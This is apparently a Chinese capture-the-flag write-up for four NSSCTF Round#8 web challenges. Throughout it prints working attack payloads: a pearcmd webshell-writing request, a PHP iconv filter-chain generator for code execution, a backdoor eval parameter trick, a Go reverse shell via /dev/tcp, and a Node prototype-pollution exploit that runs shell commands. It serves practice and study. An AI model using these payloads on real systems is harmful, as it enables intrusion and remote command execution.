NSSCTF Round#8 web专项赛

文章目录

MyPage
- 方法一： pearcmd.php
- 方法二：多级连接绕过
- 方法三： PHP Base64 Filter 宽松解析
MyDoor
Upload_gogoggo
ez_node

MyPage

Where is my page？

拿到题目就是这个样子

感觉就是文件包含

可以读取，可以用filter协议

但是index.php怎么尝试都没读取到,data和input等协议都被ban了

方法一： pearcmd.php

filter读取不到index.php，可以试试pearcmd.php的姿势写shell

index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1]);?>+/tmp/shell.php

利用文件包含漏洞包含这个文件即可

方法二：多级连接绕过

/proc/self/root/多级连接绕过 include_once

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/index.php

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/flag.php

注意最后是proc/self/cwd/

index.php源码是

<?php
error_reporting(0);include 'flag.php';if(!isset($_GET['file'])) {header('Location:/index.php?file=');
} else {$file = $_GET['file'];if (!preg_match('/\.\.|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {include_once $file;} else {die('error.');}
}

include_once 不能重复包含,然后上面已经有include 'flag.php' 包含了，所以读不到flag.php

至于不能正常读到index.php我比较迷惑，应该是执行这个文件其实已经算包含一遍了，也是include_once的问题，换成include就可以正常读。

/proc/self/root/多级连接绕过原理可参考此文

require_once 绕过不能重复包含文件的限制

方法三： PHP Base64 Filter 宽松解析

我在写这题时候用了这个方法，不过payload生成可能产生一点问题,复现倒是很顺

<?php
$base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"; /* <?=`$_GET[0]`;;?> */$conversions = array('R' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2','B' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2','C' => 'convert.iconv.UTF8.CSISO2022KR','8' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2','9' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB','f' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213','s' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61','z' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS','U' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932','P' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213','V' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5','0' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2','Y' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2','W' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2','d' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2','D' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2','7' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2','4' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
);$filters = "convert.base64-encode|";
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
$filters .= "convert.iconv.UTF8.UTF7|";foreach (str_split(strrev($base64_payload)) as $c) {$filters .= $conversions[$c] . "|";$filters .= "convert.base64-decode|";$filters .= "convert.base64-encode|";$filters .= "convert.iconv.UTF8.UTF7|";
}
$filters .= "convert.base64-decode";$final_payload = "php://filter/{$filters}/resource=/etc/passwd";echo $final_payload;
#var_dump(file_get_contents($final_payload));

MyDoor

一个普通的后门。

这题的初始页面与上题一模一样

不一样的是可以直接伪协议读取到index.php (没用include_once)

能filter伪协议读取到index.php的源码

<?php
error_reporting(0);if (isset($_GET['N_S.S'])) {eval($_GET['N_S.S']);
}if(!isset($_GET['file'])) {header('Location:/index.php?file=');
} else {$file = $_GET['file'];if (!preg_match('/\.\.|la|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {include $file;} else {die('error.');}
}

可以利用eval执行命令

 eval($_GET['N_S.S']);

这个参数N_S.S还涉及到了php的非法传参问题

当PHP版本小于8时，如果参数中出现中括号[，中括号会被转换成下划线_，但是会出现转换错误导致接下来如果该参数名中还有非法字符并不会继续转换成下划线_，也就是说如果中括号[出现在前面，那么中括号[还是会被转换成下划线_，但是因为出错导致接下来的非法字符并不会被转换成下划线_

那么就可以用N[S.S 传参

flag找了挺久，在环境变量env里面

Upload_gogoggo

没有任何过滤的文件上传！

是一个golang的文件上传类似于[2022DASCTF MAY 挑战赛] hackme 没有复现吃亏了

之前也没接触很少go的题目

这里上传了个pass.png 可以看到它System output : go pass: unknown command

执行了 go pass的命令

可以上传一个golang命令执行的文件 run.go ，这样就会执行 go run的命令

package mainimport ("fmt""log""os/exec"
)func main() {cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/vps/ip 0>&1")out, err := cmd.CombinedOutput()if err != nil {fmt.Printf("combined out:\n%s\n", string(out))log.Fatalf("cmd.Run() failed with %s\n", err)}fmt.Printf("combined out:\n%s\n", string(out))
}

flag是藏在home下

ez_node

const express = require("express");
const path = require("path");
const fs = require("fs");
const multer = require("multer");const PORT = process.env.port || 3000
const app = express();global = "global"app.listen(PORT, () => {console.log(`listen at ${PORT}`);
});function merge(target, source) {for (let key in source) {if (key in source && key in target) {merge(target[key], source[key])} else {target[key] = source[key]}}
}let objMulter = multer({ dest: "./upload" });
app.use(objMulter.any());app.use(express.static("./public"));app.post("/upload", (req, res) => {try{let oldName = req.files[0].path;let newName = req.files[0].path + path.parse(req.files[0].originalname).ext;fs.renameSync(oldName, newName);res.send({err: 0,url:"./upload/" +req.files[0].filename +path.parse(req.files[0].originalname).ext});}catch(error){res.send(require('./err.js').getRandomErr())}
});app.post('/pollution', require('body-parser').json(), (req, res) => {let data = {};try{merge(data, req.body);res.send('Register successfully!tql')require('./err.js').getRandomErr()}catch(error){res.send(require('./err.js').getRandomErr())}
})

这题没看懂

http://gtg.ink/ez-node-NSSCTF-round-8/ 出题人的wp

https://blog.csdn.net/weixin_52585514/article/details/128985443 V2师傅的wp

此题类似BalsnCTF 2022 2linenodejs ，v2师傅就直接用这个题的exp打

预期解是

//上传部分
obj={getRandomErr:() => {return require('child_process').execSync('cat /flag')}
}
module.exports = obj//污染部分
{"constructor":{"prototype":{"data":{"exports":{".":"./16285e8a41e03031c3638c8991393bc8.js"},"name":"./err.js"},"path":"./upload"}}
}